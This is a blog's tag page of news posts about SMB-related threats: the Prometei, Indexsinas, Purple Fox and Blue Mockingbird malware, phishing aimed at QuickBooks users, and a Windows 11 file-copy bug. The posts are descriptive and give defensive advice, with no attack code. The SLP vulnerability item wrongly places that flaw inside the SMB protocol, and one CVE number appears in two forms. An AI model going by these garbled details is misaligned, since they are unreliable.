Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label SMB. Show all posts

Prometei Botnet: The Persistent Threat Targeting Global Systems

 

The Prometei botnet, active since at least 2016, continues to pose a persistent threat worldwide by exploiting unpatched software vulnerabilities. First identified in 2020, Prometei has since infected over 10,000 systems across diverse regions, including Brazil, Indonesia, Turkey, and Germany. Its resilience stems from its focus on widely used software gaps, particularly in systems with weak configurations, unmonitored security measures, or outdated patches. The Federal Office for Information Security in Germany has labeled it a medium-impact threat, given its extensive reach and ability to bypass security protocols. Prometei operates by exploiting vulnerabilities in widely used software, spreading particularly through unpatched or poorly configured Exchange servers. 

Critical Start’s Callie Guenther highlights Prometei’s strategy of leveraging regions with inadequate cybersecurity, making it highly effective in targeting various systems regardless of location. One notable aspect is its ability to spread through legacy vulnerabilities, such as the BlueKeep flaw in Remote Desktop Protocol (RDP), which has a critical CVSS score of 9.8. By targeting these known issues, Prometei can quickly access poorly maintained systems that remain unprotected. A Prometei attack often starts with a series of network login attempts, typically originating from locations associated with known botnet infrastructure. Once access is secured, the malware tests various system weaknesses, particularly outdated vulnerabilities like BlueKeep and EternalBlue. If successful, it can propagate through Server Message Block (SMB) systems or use ProxyLogon flaws to exploit Windows environments further. 

Prometei’s use of outdated exploits could be seen as less sophisticated; however, its approach is strategic, focusing on identifying vulnerable, under-maintained systems rather than tackling those with robust security protocols. Once established in a target system, Prometei employs several techniques to maintain control and evade detection. For example, it uses a domain generation algorithm (DGA) to enhance its command-and-control (C2) system, allowing continuous operation even if some domains are blocked. It further manipulates firewall settings to ensure its traffic is not obstructed, enabling it to persist even after system reboots. Among its advanced methods is the use of the WDigest protocol, which stores plaintext passwords in memory. 

Prometei forces systems to store passwords in plaintext, then exfiltrates them while bypassing detection by configuring Windows Defender to ignore specific files. The primary goal of Prometei appears to be cryptojacking, as it harnesses infected systems to mine the Monero cryptocurrency without the owners’ knowledge. Additionally, it installs an Apache web server as a web shell, creating a backdoor for attackers to upload more malicious files or execute commands. Prometei’s presence, according to Trend Micro’s Stephen Hilt, often signals deeper security concerns, as it can coexist with other malicious software, highlighting vulnerabilities that attackers may leverage for various purposes. Interestingly, Prometei avoids certain regions, specifically targeting systems outside former Soviet countries. Its command-and-control servers bypass exit nodes within these nations, avoiding accounts tagged as “Guest” or “Other user” in Russian.

Older versions of Prometei also included Russian-language settings, hinting at a potential connection to Russian-speaking developers. The botnet’s name, “Prometei,” references the Greek titan Prometheus, symbolizing a persistence that echoes the botnet’s own sustained presence in global cyber threats. Prometei exemplifies the persistent and evolving nature of modern botnets. Its success in exploiting well-known but unpatched vulnerabilities underscores the importance of maintaining updated security systems. For organizations worldwide, especially those with legacy systems or lax monitoring, Prometei serves as a critical reminder to reinforce defenses against cyber threats, as outdated security leaves systems vulnerable to malicious actors seeking to exploit any gap available.

SMB Cyber Threats: Information-Stealing Malware, Ransomware, and BEC

 

In today's digital landscape, small and medium-sized businesses (SMBs) are increasingly becoming prime targets for cybercriminals looking to exploit vulnerabilities for financial gain. A recent report from cybersecurity firm Sophos sheds light on the top cyber threats facing SMBs, highlighting information-stealing malware, ransomware, and business email compromise (BEC) as the most prevalent dangers. 

These malicious programs are designed to clandestinely gather sensitive data and login credentials, posing significant risks to businesses that may not have robust cybersecurity measures in place. The insidious nature of infostealers lies in their ability to operate discreetly, often evading detection until substantial damage has been done. 

Christopher Budd, director of Sophos X-Ops, underscores the escalating value of stolen data among cybercriminals, particularly concerning SMBs. He elucidates a hypothetical scenario where attackers exploit infostealers to compromise a business's accounting software, thereby gaining access to critical financial information and potentially siphoning funds into their own accounts. 

This underscores the dire consequences of falling victim to information-stealing malware, which can have far-reaching financial and reputational implications for SMBs. Despite the prevalence of infostealers, ransomware remains the most significant threat to SMBs' cybersecurity. While Sophos reports that the number of ransomware attacks has stabilized, the evolution of ransomware tactics continues unabated. 

One alarming trend highlighted in the report is the rise of remote encryption attacks, wherein threat actors leverage unmanaged devices within a victim organization to encrypt files on other systems. This sophisticated approach underscores the adaptability and persistence of ransomware operators in their quest to extort businesses for financial gain. 

Following closely behind ransomware, BEC attacks represent another formidable threat to SMBs. These attacks involve cybercriminals engaging in deceptive email correspondence or even phone calls with victims to gather sensitive information or manipulate them into transferring funds. The increasing sophistication of BEC tactics poses significant challenges for SMBs, as attackers leverage social engineering techniques to bypass traditional cybersecurity defenses. 

To mitigate these cyber threats effectively, SMBs must adopt a multi-faceted approach to cybersecurity. This includes implementing robust endpoint protection solutions, regularly updating software to patch known vulnerabilities, and providing comprehensive employee training on cybersecurity best practices. 

Additionally, adopting measures such as multi-factor authentication and encryption can add layers of security to sensitive data and communications, making it more challenging for cybercriminals to exploit vulnerabilities.

The SMBs must remain vigilant in the face of evolving cyber threats and prioritize cybersecurity as a fundamental aspect of their business operations. By staying informed about emerging threats and investing in proactive cybersecurity measures, SMBs can fortify their defenses and safeguard their digital assets against malicious actors. With cyber threats continuing to evolve in sophistication and scale, proactive cybersecurity measures are essential for protecting the interests and integrity of SMBs in today's digital landscape.

SLP Vulnerability Exposes Devices to Powerful DDoS Attacks

Security researchers have recently discovered a new vulnerability that has the potential to launch devastating Distributed Denial of Service (DDoS) attacks. The Server Message Block (SMB) protocol, which is widely used in various devices and systems, including Windows machines and some network-attached storage devices, contains the SLP vulnerability. Attackers can exploit this vulnerability to send specially crafted SMB packets that force the target device to allocate excessive memory or processing power to the request, ultimately causing a crash or downtime.

The SLP vulnerability is particularly dangerous because it enables attackers to amplify the impact of their DDoS attacks by up to 2200 times more than previous methods. This increased power can overwhelm the target’s defenses and cause lasting damage. Unfortunately, there is no straightforward solution for this vulnerability as it is deeply embedded in the SMB protocol and affects various devices and systems. However, organizations can take some steps to mitigate the risk of attack, such as implementing access controls, and firewalls, and monitoring their networks for any suspicious SMB activity.

The discovery of the SLP vulnerability highlights the need for robust cybersecurity measures and constant vigilance against evolving threats. As attackers develop new tactics and exploit new vulnerabilities, organizations must stay ahead of the curve and protect their networks and systems from harm.

The SLP vulnerability is a significant concern for organizations that use SMB protocol, as it exposes them to potential DDoS attacks. The impact of these attacks can be devastating and long-lasting, highlighting the need for constant vigilance and strong cybersecurity measures. Organizations must take proactive steps to monitor their networks, implement access controls, and limit the exposure of SMB services to the internet to mitigate the attack risk. The discovery of the SLP vulnerability underscores the critical importance of staying ahead of the curve in cybersecurity and constantly adapting to new threats.

Ransomware Attacks on the Small and Medium Businesses are on the Rise

 

The risk of being victimised by ransomware has grown over time. The frequency and sophistication of these attacks, which affects every industry, have both steadily increased. Additionally, when these attacks become more well-known among businesses, they search for fresh defenses against them. 

61 percent of all cyberattacks targeted small firms, according to a survey by Checkpoint. The report also notes that few small and medium-sized enterprises (SMBs) are aware that they are vulnerable to these internet risks just like the larger corporations. SMEs may strengthen their internet security by using the three steps Checkpoint has provided. 

Maintain IT equipment, and make routine repairs

Keeping your systems updated with the most recent software and security updates can prove to be extremely beneficial when it comes to safeguarding your organisation against any cyber-attacks. 

According to a recent report, 80% of all BYODs (bring your own devices) at a firm are not monitored, which presents a chance for hackers to exploit these unattended systems. Updates for tablets, smartphones, laptops, and PCs used for office work should be installed as soon as they are made available. This is one of the most crucial steps you can take to increase security. By ensuring that their operating systems, software, phones, and apps are set to update automatically, users can also prevent gaps in their security posture. 

Monitor the usage of hard drives and USB sticks

For at least part of the week, 40% of SMB employees must work remotely. The security of these gadgets must be controlled properly at all times, and that is the top responsibility of the company. Using an external USB drive or memory stick, workers frequently transfer files between teams or to different businesses.

The fact that one unsecured device is all it takes to compromise an entire network should not be overlooked. It is exceedingly challenging to trace the files that are stored on storage devices because they are shared publicly. The likelihood of a breach can be decreased by using endpoint protection measures, restricting access to physical ports, and only permitting the use of authorised sticks or memory cards. 

Avoid backing up data on the main server 

If you keep all of your company's data on the same server, there is a potential that a hacker may access it all in the event of an assault. Organizations should determine the critical information that is necessary for their operations and establish an entirely separate, off-site network backup. Employees will be able to access crucial files, allowing them to carry on with daily operations, and this will assist the company in recovering from a ransomware assault. 

Emails are Vulnerable to Cyber Threat

Small businesses and organizations of various sizes worldwide rushed to upload patches and assess what had been compromised. Hacks expose the vulnerability of the 32 million small businesses, which are largely unable to afford to work with cybersecurity firms and also who primarily rely on built-in security measures of software and hardware providers.

As per Iram, a former Israeli intelligence officer, large tech firms can improve their systems prior to being released in order to block hackers before they impact small and medium-sized firms. He adds that cybercrime reduced each time major software companies modified default settings or other general updates with cybersecurity in mind.

According to market research company Gartner, Microsoft has more than 86% of the enterprise e - mails processing market whereas Google has just under 13%.

Challenges with email 

The notion that several components of today's technological stack were created before cybercriminals became a concern is the root of many of its problems. Big firms that predominate the industry typically have still not added security as a default feature to basic software, leaving it to the cybersecurity market to do so. This has led to explosive growth in a new category of companies.

Microsoft Defender for Office 365 finds and stops thousands of user compromise actions each month in addition to nearly 40 million emails with Business Email Compromise, or BEC, and 100 million emails with harmful credential phishing links.

Some cybersecurity enterprises with a focus on the small business sector have launched in the last three to five years, such as Huntress and SolCyber. Even the slightest flaws in one organization, in a highly networked society, can spread to another. An NPR investigation into the significant Microsoft Exchange data breach came to the conclusion that Chinese hackers were targeting American businesses in an effort to collect consumer data on Americans for an unidentified reason.

The American government has so far adopted a conservative stance; a representative for the U.S. Cybersecurity Infrastructure Agency claimed that the agency does not regulate software for small businesses.


Performance Hit Experienced By File Copying Due to Windows 11 22H2

 


According to reports, Microsoft began rolling out Windows 11 version 22H2 last month, just a few months after announcing it. The experience has not been completely smooth as one might think. 

"22H2 has a performance problem when copying large files from a remote computer to a Windows 11 computer or when copying files on a local drive," explains Ned Pyle, Principal Program Manager at Windows Server engineering.

There have been several reports of users reporting that the update failed with an error code of "0x800f0806". Interestingly enough, one of our Neowin members was able to figure out a workaround for this problem. There are also the usual suspects, like printer problems as a result of a revised printer policy that leads to printers not being detected after the 2022 Update, which can result in a lot of frustration. 

There was another related issue that caused Microsoft to block the whole update on affected devices due to this problem. Afterward, Microsoft issued a warning to IT admins on the issue, stating that provisioning for Windows 11 22H2 is currently broken, as it discovered the existence of this issue.

Additionally, the Redmond-based firm revisited another problem that was resulting in the massive slow-down in the speed at which large files could be copied remotely on 22H2 systems as a result of a power failure. 

There have been reports that speeds are around 40% lower than expected, according to the company. Although users are experiencing more performance issues than before, the situation seems to be getting increasingly problematic.

Earlier this week, Microsoft released KB5017389 preview cumulative update for Windows operating systems. This update included the fixes for this issue as well as a free trial of the update for those who have not yet downloaded it. The support document provides more information regarding this issue and also offers a free trial of the release.

It might take longer than expected for Windows 11 version 22H2 to copy large files with multiple gigabytes (GB) to complete the task as previously thought.

Despite the newly acknowledged issue, Microsoft added that Windows devices that are used in small or personal networks are less likely to be affected by it than those used for business networks.

A workaround is available for this issue, it has also been reported that Microsoft has shared a workaround for customers who are affected by the known issue after updating their devices to Windows 11 22H2.

There are several ways in which impacted users can mitigate the performance hit of file copying over SMB by using file copy tools that do not use a cache manager (buffered I/O) such as any of the freeware applications available on the Internet.

To resolve this issue, Microsoft is currently investigating and working on a solution to address it. As part of a future release, the issue will be addressed in a more detailed way, and this will be included in a more detailed update. 

It has been more than two years since Microsoft released Windows 11 22H2, and they have now added compatibility holds to make sure the upgrade is no longer available on some systems, due to printer problems or blue screens.

As part of this week's announcement, Microsoft confirmed that the Windows 11 2022 Update is also causing provisioning issues, which is causing Windows 11 endpoints to be partially configured and not complete the installation process. 

After entering a new deployment phase on Tuesday, October 4, Windows 11 22H2 is now available to all seekers on qualifying devices, and it has been installed on some of the devices already.

Users of Intuit QuickBooks Targeted in Phishing Scams

 

Intuit, a financial software business based in the US, has issued a warning to its clients about a new QuickBooks phishing effort. The current phishing campaign, which is the company's fifth big security threat this year, involves deceiving consumers into believing one‘s account has been suspended. 

"We're writing to advise you that we were unable to confirm certain information on your account after performing an assessment of your company. As a result, we've placed a temporary hold on your account." The phishing message goes as follows: "If you believe we've made a mistake, please let us know as soon as possible so we can correct it. Please fill out the verification form below to assist us with effectively revisiting your account. We will re-evaluate your account within 24-48 hours after verification is finished." 

Malicious material within the bogus Intuit support team message would send the target to a phishing website where criminals may steal personal data or install malware on infected devices if they clicked the "Complete Verification" button. The sender "is not linked with Intuit, is not an authorized agent of Intuit, nor is their use of Intuit's logos permitted by Intuit," according to the accounting software Intuit. Customers are advised not to open these phishing messages.

Small and medium-sized businesses (SMBs) all over the world utilize Intuit's QuickBooks software. According to the company's website, there are 4.5 million users globally. This year, cyber attackers have targeted the company's vast user base, particularly around tax season in the United States, when the corporation was compelled to release two separate security advisories in as many days in February. 

The email in both phishing scams pretended to be an account inactivity warning, suggesting that the user's account had been disabled due to inactivity. Victims were sent links to a bogus Intuit website, which could have been used to steal account information. 

It also advises consumers to delete the communications from email inboxes to avoid personal data being stolen and a possible malware infection. Customers who opened the email clicked a link, or downloaded a possibly harmful attachment should take the following precautions: 
  • Delete the downloaded attachment right away. 
  • Passwords should be changed regularly. 
  • Run a complete scan on the machine that may have been hacked. 
  • Intuit also offers a comprehensive list of security advice that can assist customers in avoiding common cyberattacks such as phishing emails, customer service scams, and identity theft.

Indexsinas SMB Worm Attacks Vulnerable Environments

 

The  Indexsinas SMB worm is aiming for susceptible situations in which scientists cautioned – focusing on healthcare, hospitality, education, and the telecommunications industries. Its ultimate objective is to reduce crypto miners on hacked PCs. 

Since 2019, Indexsinas, aka NSABuffMiner, has been lurked. It uses the old weapon arsenal Equation Group, along with EternalBlue and EternalRomance, to invade Windows SMB shares and DoublePulsar backdoor. Indexsinas is using lateral mobility to assimilate specific environments aggressively. 

“Propagation is achieved through the combination of an open-source port scanner and three Equation Group exploits – EternalBlue, DoublePulsar, and EternalRomance,” as per a Guardicore Labs analysis 

Since 2019, Indexsinas has deployed a broad infrastructure consisting of over 1,300 devices operating as sources of attack, and every device is accountable for only certain cases of attack (most likely hacked systems, Guardicore observed, particularly in India, the USA, and Vietnam). To date, almost 2,000 different attacks have been reported in Guardicore's telemetry. 

The shroud of attacks to find out more about cyber attackers behind Indexsinas is quite difficult to breach. 

“The Indexsinas attackers are careful and calculated,” according to the firm. “The campaign has been running for years with the same command-and-control domain, hosted in South Korea. The [command-and-control] C2 server is highly protected, patched, and exposes no redundant ports to the internet. The attackers use a private mining pool for their crypto mining operations, which prevents anyone from accessing their wallets’ statistics.” 

According to Guardicore Labs, the attack commences when a machine is infringed using the NSA's tools. These attacks run code in the kernel of the victim and can inject payloads to user mode utilizing asynchronous procedure calls (APCs). 

Researchers noted, “Indexsinas uses the exploits to inject code to either explorer.exe or lsass.exe. The injected payloads – EternalBlue.dll for 32-bit and DoublePulsar.dll for 64-bit – download three executable files from the main C2 server.”

It has been reported that there is a whole reversed DLL file in the file downloads which is a Portable Executable file, a version of a Gh0stCringe remote access tool (RAT). 

The first one installs the RAT, while the second provides a key feature for C2 commands and reporting machine information, including computer name, malware group ID, date of installation, and technical specs of CPUs. 

The files iexplore.exe and services.exe meanwhile install two services utilizing the tool which impersonates the Windows svchost.exe function. The first service has to drop the crypto miner, whereas the second just runs the crypto miner module. 

c64.exe, which in turn dumps two files is yet another payload downloaded as part of the initial stage. One is the executable ctfmon.exe — the propagation tool. 

“Ctfmon.exe is responsible for finding potential victims and exploiting them using Equation Group’s tools – and it does that extremely thoroughly,” researchers said. “It uses exploits for both 32-bit and 64-bit machines and scans both RPC (TCP 139) and SMB (TCP 445) ports. Moreover, it tries to move laterally within the organizational network as well as spread across the internet.” 

A timetabled task performs a batch script that installs a service. The service launches a second batch script that scans and uses the port. 

The batch scripts in these flows also uninstall the services of competitors, end their operations and erase their files. 

“It is crucial that network administrators, IT teams, and security personnel be able to easily identify assets and the services they run,” they explained. “Specifically, it should be easy to spot internet-facing servers, SMB included. With visibility in place, network admins would want to limit the access from and to different assets and the network services they expose.” 

Corporate functions and production activities, for example, should be separated. Policy rules can also be applied that secure SMB servers of an organization, such as the interdiction of internet access via SMB or only permit specified IP addresses to access the firm's internet fileserver. This can help in prevention against Indexsinas Worm Infections.

New Worm Capabilities Targets Windows Machines

 

A malware that has verifiably targeted exposed Windows machines through phishing and exploit kits have been retooled to add new "worm" capabilities. Purple Fox, which originally showed up in 2018, is an active malware campaign that as of, not long ago required user interaction or some kind of third-party tool to infect Windows machines. However, the assailants behind the campaign have now upped their game and added new functionality that can force its way into victims' systems on its own, as indicated by new Tuesday research from Guardicore Labs.

“Guardicore Labs have identified a new infection vector of this malware where internet-facing Windows machines are being breached through SMB password brute force,” Guardicore Labs Amit Serper said. In addition to these new worm abilities, Purple Fox malware now additionally incorporates a rootkit that permits the threat actors to conceal the malware on the machine and make it hard to distinguish and eliminate, he said. 

Researchers examined Purple Fox's most recent activity and discovered two huge changes to how assailants are spreading malware on Windows machines. The first is that the new worm payload executes after a victim machine is undermined through a weak exposed service. Purple Fox additionally is utilizing a past strategy to contaminate machines with malware through a phishing effort, sending the payload by means of email to exploit a browser vulnerability, researchers observed. When the worm infects a victim's machine, it creates a new service to establish persistence and execute a simple command that can iterate through a number of URLs that include the MSI for installing Purple Fox on a compromised machine, said Serper. 

“msiexec will be executed with the /i flag, in order to download and install the malicious MSI package from one of the hosts in the statement,” he explained. “It will also be executed with the /Q flag for ‘quiet’ execution, meaning, no user interaction will be required.”

Gadgets caught in this botnet incorporate Windows Server machines running IIS form 7.5 and Microsoft FTP, and servers running Microsoft RPC, Microsoft Server SQL Server 2008 R2, and Microsoft HTTPAPI httpd 2.0, and Microsoft Terminal Service.

The Blue Mockingbird Malware Group Exploits Vulnerabilities in Organizations' Networks


Another notorious crypto-currency mining malware has surfaced which allegedly has been infecting the systems of countless organizations. The group with the control of operations goes by the code name of “Blue Mockingbird”.

The researchers who discovered it have reasons to believe that the Blue Mockingbird has been active since 2019’s last month. Per them, it also targets “public-facing servers” that run “ASP.NET” apps that use the “Telerik framework” for their User Interface (UI) aspect.

Reportedly, the vulnerability that the hackers exploit in the process is the “CVE-2019-18395” vulnerability which is then employed to embed a web shell on the target’s server. Per the same report, later on they employ a version of “the Juicy Potato technique” to obtain the admin-access and alter the server settings to get access to the “(re)boot persistence”.

After having obtained complete access to a system, sources mention, the malware group installs a version of XMRRig which is a famous crypto-currency mining application particularly for the “Monero (XMR)” crypto-currency.

As per reports, if the public-facing IIS servers are linked with a company’s internal network, the malware group has a probability of trying to expand internally through an improperly-secured Server Message Block (SMB) connections or Remote Desktop Protocol ((RDP).

The exact number of infections that the botnet has caused isn’t all too clear but if an estimate was to be made the operations include 1,000 infections at the least. There also doesn’t seem to be a way to find the intensity of the threat.

Not many organizations out of the ones that were being observed by the researchers have been hit with this particular threat. And over a really little amount of time that they were tracked the above-mentioned number of infections surfaced.

Nevertheless, all companies alike are susceptible to this attack, even the ones that think they are safe and the number of infections could be more than estimated.

As per sources, the Telerik UI component which is allegedly vulnerable is a part of ASP.NET applications that run on their latest versions, even then the Telerik component may have versions that are out-dated but harmful to organizations, nonetheless. This component could exist in the applications used by a company and they might not even know about it leaving them endangered.

The Telerik UI CVE-2019-18935 vulnerability, per reports, has been widely let known as the one that is employed to embed web shells on servers. Another mentioned that this vulnerability is the most exploited and organizations need to better their firewalls to fight it. If for some reason the organizations don’t happen to have a web firewall they could always look for warning precursors in the server and workstation, reports cite.